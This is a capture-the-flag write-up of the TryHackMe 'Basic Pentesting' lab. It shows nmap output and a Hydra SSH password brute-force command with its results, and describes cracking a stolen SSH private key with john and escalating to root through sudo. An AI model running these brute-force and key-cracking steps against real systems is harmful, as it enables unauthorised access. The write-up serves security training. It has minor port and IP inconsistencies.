TryHackMe — Basic Pentesting Writeup
TL&DR; This is a Linux box with a webserver and SMB that reveal usernames. We can use this to brute force Jan’s password and log in using SSH. We can escalate to Kay (another user) by retrieving his encrypted SSH key, decrypting it, and logging back in as Kay. Finally, we can abuse Kay’s sudo rights to switch to root.
Scanning:
Let's start with a Nmap scan.
# Command: nmap -T4 -A -p- -Pn 10.10.142.236 -oA nmap_full
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-25 18:52 IST
Nmap scan report for 10.10.137.12
Host is up (0.16s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.7
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=6/25%OT=22%CT=1%CU=33797%PV=Y%DS=2%DC=T%G=Y%TM=60D5DA8
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)Network Distance: 2 hops
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m33s, median: 1s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2021-06-25T09:30:45-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-25T13:30:45
|_ start_date: N/ATRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 161.14 ms 10.11.0.1
2 161.20 ms 10.10.137.12OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 476.57 seconds
So a total of 6 ports are open,
- Port 22 — OpenSSH 7.2p2
- Port 80 — Apache httpd 2.4.18
- Port 139 — netbios-ssn Samba smbd 3.X — 4.X
- Port 445 — netbios-ssn Samba smbd 4.3.11-Ubuntu
- Port 8089 — Apache AJP13
- Port 8080 — Apache Tomcat 9.0.7
Reconnaissance:
Port 80 — Apache Webserver:
Visting the site, we see an under maintenance message.
But, the source reveals something.
It seems there is a dev section that contains notes on what is going to be done with this service.
Let’s find this directory using dirsearch.
Let’s check the /development folder.
Let’s the contents of these files.
So, we can conclude that user J has a weak password. This could be brute-forced by us, but we need to find what J stands for i.e the actual username.
Port 139,445 — Samba:
Let’s see what shares are available using smbmap.
The Anonymous share is readable, let’s access it using smbclient.
There’s a file on this share, let’s download it.
Checking its contents,
We see that this message is from Kay and to the staff. But it points out a member, Jan. We see that these names match the initials J and K from the earlier dev.txt and j.txt on the webserver.
We might have found the username and let’s try brute-forcing Jan’s password to log in using SSH.
Exploitation (Low Privilege User):
We can brute force Jan’s SSH password using Hydra.
Syntax: hydra -l {username} -P {path_to_password_wordlist} -t {Number_of threads} ssh
#Command hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.142.236 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-25 19:50:58
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.142.236:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 28.00 tries/min, 84 tries in 00:03h, 14344315 to do in 8538:17h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
^L[STATUS] 27.47 tries/min, 412 tries in 00:15h, 14343987 to do in 8703:53h, 4 active
[22][ssh] host: 10.10.142.236 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-25 20:19:22
We’ve found the password, let’s log in using SSH.
Privilege Escalation to Kay:
Checking the contents of /home, we see the other user Kay’s folder.
Let’s check the contents of kay’s home folder.
3 files immediately stand out,
- .lesshst — Owned by root, but we cannot read this file
- pass.bak — Hints at being a password. Owned by root, but we cannot read this file
- .ssh — Owned by Kay. But we can actually access this directory.
It seems we can actually access Kay’s .ssh directory. Let’s check its contents.
Kay’s private key is readable. Hence, we can save it and log in as Kay.
But while copying his private key, I noticed that it is encrypted. And we have no password, so we will have to crack this using john.
Cracking the key for Kay’s Private Key:
After getting the key to the attacker’s machine, we have to first convert this key to a format that john will accept. To do this, we can use the ssh2john tool.
Now we can crack the converted key using john and rockyou.txt for the wordlist.
We’ve found the key, now we can log in as Kay.
Logging in as Kay:
When we try to access SSH as kay,
Enter the key beeswax that we found using john. And now, we are logged in as Kay.
Privilege Escalation to root:
Now we can read pass.bak.
It's safe to assume that this is kay’s password. We can also validate this by exiting SSH and logging back in using this password.
Since we have kay’s password, let’s check if kay has any sudo rights.
So we can basically run everything using sudo. We can simply sudo su to switch to root.
And that was Basic Pentesting guys, thanks for reading my write-up. If you have any suggestions or think I missed something, please do let me know in the comments. If you have any other suggestions or questions, feel free to message me.
If you want to reach me,
Twitter: @MathewSeelan